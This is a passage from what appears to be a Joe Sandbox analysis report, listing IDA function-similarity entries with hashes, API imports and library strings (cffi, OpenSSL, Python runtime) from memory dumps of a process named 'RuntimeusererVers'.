                                                                                                                                                                                                                                          • Instruction ID: a100eba6d4068b719c7a8c875d5bd27cb08c9ce2067737b5bfac8bf8da81691b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f5fa976fdc21c662024ae26816687f03e4be8bcdd26a407f4cb266dff922d12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51A172B08A0A82EF648B59E4007B963A0FB84BE4F544635EB4C077D9DF3DF9958700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_FormatTuple_$Pack
                                                                                                                                                                                                                                          • String ID: abi number %d not supported
                                                                                                                                                                                                                                          • API String ID: 3887392137-1298965716
                                                                                                                                                                                                                                          • Opcode ID: 2dabeee60670ceba8e8974d44f08db2ae8858d3a6bccc3b012f40745e4e2c2fe
                                                                                                                                                                                                                                          • Instruction ID: 3f1f9053ce32da51ca8f274d67b9fce695905272b04f1011ef506932c7b5277a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dabeee60670ceba8e8974d44f08db2ae8858d3a6bccc3b012f40745e4e2c2fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3418C22A15E4285EB199F259C642F827A4FF45BF8F498635DE0E17754DF3CF4418300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Buffer_$ArgumentBufferContiguousKeywordsObject_ReleaseUnpack
                                                                                                                                                                                                                                          • String ID: argument 'key'$contiguous buffer$hmac_new
                                                                                                                                                                                                                                          • API String ID: 3699177490-206859838
                                                                                                                                                                                                                                          • Opcode ID: 754315372aba918daff17f2ef17cfa320ec5591b04e4a443cbeeea477356caac
                                                                                                                                                                                                                                          • Instruction ID: aad7142ef95e6d9f70e9451c79d603ba6b05568100e8b9f7e77f2361d124fbd4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754315372aba918daff17f2ef17cfa320ec5591b04e4a443cbeeea477356caac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2414D22A19F8382EA60CB51E445BA9A3A0FB957F4F444236DE8C07B55EF7CF5A4C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Err_Keywords_ParseSizeStringSubtypeTupleType_
                                                                                                                                                                                                                                          • String ID: Can remove destructor only on a object previously returned by ffi.gc()$O!O|n:gc
                                                                                                                                                                                                                                          • API String ID: 2258746257-2175166513
                                                                                                                                                                                                                                          • Opcode ID: 5b5d3f2258028ee15e0ad0de0815b677d03f1e683889cfd688afb36539bc1e85
                                                                                                                                                                                                                                          • Instruction ID: 8bf918816f5a4c9813351ebfcdf04b049b4ac7cc8b18ab14c4e65934914e1df2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b5d3f2258028ee15e0ad0de0815b677d03f1e683889cfd688afb36539bc1e85
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56410436A08F42C2EB44CF65EC641A973A5FB88BE4B540636EA8D43B14DF3DE455C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • initializer for ctype '%s' is correct, but we get an internal mismatch--please report a bug, xrefs: 00007FF81E503C1C
                                                                                                                                                                                                                                          • initializer for ctype '%s' must be a %s, not %.200s, xrefs: 00007FF81E503B5B
                                                                                                                                                                                                                                          • initializer for ctype '%s' must be a %s, not cdata '%s', xrefs: 00007FF81E503BBE
                                                                                                                                                                                                                                          • initializer for ctype '%s' appears indeed to be '%s', but the types are different (check that you are not e.g. mixing up different ffi instances), xrefs: 00007FF81E503BF2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: initializer for ctype '%s' appears indeed to be '%s', but the types are different (check that you are not e.g. mixing up different ffi instances)$initializer for ctype '%s' is correct, but we get an internal mismatch--please report a bug$initializer for ctype '%s' must be a %s, not %.200s$initializer for ctype '%s' must be a %s, not cdata '%s'
                                                                                                                                                                                                                                          • API String ID: 376477240-1352286566
                                                                                                                                                                                                                                          • Opcode ID: 6f889116d4a9a4041991b6468120e99f83f13f9ee929452ad63824c3f5e7f8c1
                                                                                                                                                                                                                                          • Instruction ID: 189459072a011c74ea3a0cd043df57173da5b2016b094529be7e038ff6a17ca4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f889116d4a9a4041991b6468120e99f83f13f9ee929452ad63824c3f5e7f8c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3310A75A08E5281EA448B1AED600F86361FB84BE8B984771EA2D473A5EE7DF544C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$Y_new
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_rsa.c
                                                                                                                                                                                                                                          • API String ID: 2632022502-2723262194
                                                                                                                                                                                                                                          • Opcode ID: 3fa2f0e6f69a6a838d94406baac50519cd885df6768811c83b1c210ad9617fea
                                                                                                                                                                                                                                          • Instruction ID: ff182334da62c9ebd3c6cae83b65f3c98bc80e2238a271ccf02fbed9da224c64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fa2f0e6f69a6a838d94406baac50519cd885df6768811c83b1c210ad9617fea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D216225B18A4686EB10EB65E5016F963A1FF897D4F580131EF4C47B86EF2CFD528B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_ClearDict_Err_ErrorFormatFreeLastLibraryParseSizeTuple_Unicode___stdio_common_vsprintf
                                                                                                                                                                                                                                          • String ID: closing library '%s': %s$error 0x%x
                                                                                                                                                                                                                                          • API String ID: 3709125606-4000567706
                                                                                                                                                                                                                                          • Opcode ID: 583a14c413a2bca59a83a8793f8d2e196dcc16719ce5cb8e2a6241fde0bf1b44
                                                                                                                                                                                                                                          • Instruction ID: a160183ee30f6c21ef45e3e3f726c5d27ee08d0d363359fca895914cbd375e1c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 583a14c413a2bca59a83a8793f8d2e196dcc16719ce5cb8e2a6241fde0bf1b44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6821E925A18E8282EB48CB56EDA01A97370FB88BE4B445276DE4E53764DF2DF545C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatLong_Object_SignStringUnicode_
                                                                                                                                                                                                                                          • String ID: 32-bit unsigned int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 198760793-372613038
                                                                                                                                                                                                                                          • Opcode ID: 7a09c0f2bfa9c6e3dfd53c4b396cec4babcdd805c4c34e169051fb952f2fb2fe
                                                                                                                                                                                                                                          • Instruction ID: 5f91e4ec37b5ba460a8f7bba75cc82d9b3e2ef8991e8990b20f4995fcb0ce1bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a09c0f2bfa9c6e3dfd53c4b396cec4babcdd805c4c34e169051fb952f2fb2fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19111F31A09F52C1EE599B56FD641B92390AF88BF0F144235FE5E07755DE2DF4848700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Mem_$FormatFreeMallocMemory
                                                                                                                                                                                                                                          • String ID: protocols longer than %u bytes
                                                                                                                                                                                                                                          • API String ID: 2903777688-895981740
                                                                                                                                                                                                                                          • Opcode ID: d9916402d9a81dbbda80e8b467c0f7359cd56887bd91c1c9543ed264e22cc5f4
                                                                                                                                                                                                                                          • Instruction ID: 1abfff73b06cfb099cf236b5987056a31a1181b35c4387b7c0d981370ee257e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9916402d9a81dbbda80e8b467c0f7359cd56887bd91c1c9543ed264e22cc5f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F81104A5A08E0282FB149F26E84002823B0FB88FF6B505A35CE2E47764DF38F4A48340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatObject_Unicode_
                                                                                                                                                                                                                                          • String ID: 32-bit int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 4129581467-810487915
                                                                                                                                                                                                                                          • Opcode ID: 85a9b7ad18267aaae14f9e93c918057033f0eba280644ca24943afeab3ccf243
                                                                                                                                                                                                                                          • Instruction ID: 956e4ad8bb608c42e51116c56e226fe12daa0d98ca2e81f37e1ca499fff91480
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85a9b7ad18267aaae14f9e93c918057033f0eba280644ca24943afeab3ccf243
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14011B21B09E4282EE599B69EC682F96290AF49BF4F144339E91D47795EE2DF4848301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatLong_Object_SignStringUnicode_
                                                                                                                                                                                                                                          • String ID: 8-bit unsigned int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 198760793-3731599500
                                                                                                                                                                                                                                          • Opcode ID: 586e460f31288d9cd292830d2669236e911567906b0437cab734378a3cf820f1
                                                                                                                                                                                                                                          • Instruction ID: b6e7e46d0742134dae77a33dc9cab73deb1f8df1ea07aec7bd1bd633901fea9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 586e460f31288d9cd292830d2669236e911567906b0437cab734378a3cf820f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF014031B09F02C1EE599B65FC642F823A0AF48BF0F144234E91D077A1DE6DF4848300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorFatalFuncThread_acquire_lockThread_release_lockfree
                                                                                                                                                                                                                                          • String ID: cffi: ThreadCanaryObj is already a zombie$thread_canary_make_zombie
                                                                                                                                                                                                                                          • API String ID: 613121950-1133694477
                                                                                                                                                                                                                                          • Opcode ID: 6462cbfaeb62c15b4c6bb369a1ff4d91f373138c353548cc89dcfc1122ff781c
                                                                                                                                                                                                                                          • Instruction ID: 97b4edffc29c045d8c6d8fdd8456e0e554e41531ff8d6f847f166c67785283f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6462cbfaeb62c15b4c6bb369a1ff4d91f373138c353548cc89dcfc1122ff781c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C11B471A09E06C2EA1C8B64ECA43B433A1EF88BE5F140235D51E463A0EF7DF545C281
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$DeallocFormatLong_Object_SignStringUnicode_
                                                                                                                                                                                                                                          • String ID: 16-bit unsigned int$integer %s does not fit '%s'
                                                                                                                                                                                                                                          • API String ID: 198760793-331574723
                                                                                                                                                                                                                                          • Opcode ID: ab4b5e2506e50060bd6d35f5a85d4838c88a24ba5276331cbff74327f6e2efa5
                                                                                                                                                                                                                                          • Instruction ID: 82e4cd6e2564f57adb4c95070252db2b90e1243e5af93440241805c01567161f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab4b5e2506e50060bd6d35f5a85d4838c88a24ba5276331cbff74327f6e2efa5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90011E25A09E0282EE599B69FC642B822A0AF49BF4F144634E91E07761EE2DF4448300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 57c0d09637674abbf95f21557d567e36662b0b87bb650a17be1757865c6db19c
                                                                                                                                                                                                                                          • Instruction ID: fcf75d30b449e61b861a2c62a70c3f90e1cc132a52c513722c7a072f8c16fab3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57c0d09637674abbf95f21557d567e36662b0b87bb650a17be1757865c6db19c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB819061E0CE43C6FA94AB669CB12F962E0AF457E0F144339E90E47796DE3DF4458701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC8260C
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC82618
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC82668
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC82674
                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00007FF81DC8269A
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DC826A7
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DC826B4
                                                                                                                                                                                                                                          • memset.VCRUNTIME140 ref: 00007FF81DC826F1
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF81DC826FD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF81DC82780), ref: 00007FF81DC827AF
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: LeaveCriticalSection.KERNEL32 ref: 00007FF81DC827C3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DC827D0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DC827DD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: WaitForSingleObject.KERNEL32 ref: 00007FF81DC82815
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: CloseHandle.KERNEL32 ref: 00007FF81DC82820
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: GetLastError.KERNEL32 ref: 00007FF81DC8282E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: DeleteCriticalSection.KERNEL32 ref: 00007FF81DC8284B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConditionCriticalSectionVariable$Initializecallocmemset$Wake$CloseDeleteEnterErrorHandleLastLeaveObjectSingleWait
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object_$Buffer_Release$BufferClearErr_Instance
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
